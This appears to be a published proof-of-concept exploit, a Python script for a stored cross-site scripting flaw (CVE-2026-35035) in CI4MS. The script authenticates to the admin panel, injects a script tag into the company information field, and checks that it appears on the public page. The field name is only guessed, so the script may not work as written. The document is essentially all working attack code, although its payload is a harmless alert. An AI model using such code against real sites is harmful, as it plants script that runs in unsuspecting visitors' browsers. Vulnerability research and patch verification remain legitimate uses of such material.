CVE-2026-35035 CI4MS存储型XSS漏洞

import requests # Exploit Title: CI4MS < 0.31.2.0 - Stored XSS in Company Information # Description: Inject malicious script via admin panel and trigger on public page. target_url = "http://target-ci4ms-site.com" login_url = f"{target_url}/admin/login" settings_url = f"{target_url}/admin/settings/company" public_url = f"{target_url}/" # Admin credentials (simulated) username = "admin" password = "password" # Malicious payload to be stored xss_payload = "<script>alert('CVE-2026-35035 XSS');</script>" session = requests.Session() # Step 1: Authenticate as Admin data = {'email': username, 'password': password} session.post(login_url, data=data) # Step 2: Send Payload to System Settings - Company Information # Assuming the field name is 'company_name' or similar based on description post_data = { 'company_name': xss_payload, # Injecting XSS here 'update': 'Save' } response = session.post(settings_url, data=post_data) if response.status_code == 200: print("[+] Payload injected successfully via Admin Panel.") # Step 3: Verify execution on Public Page # Visit the main landing page as a normal user public_response = session.get(public_url) if xss_payload in public_response.text: print("[+] Vulnerability confirmed: Payload reflected on public page.") else: print("[-] Payload not found on public page.")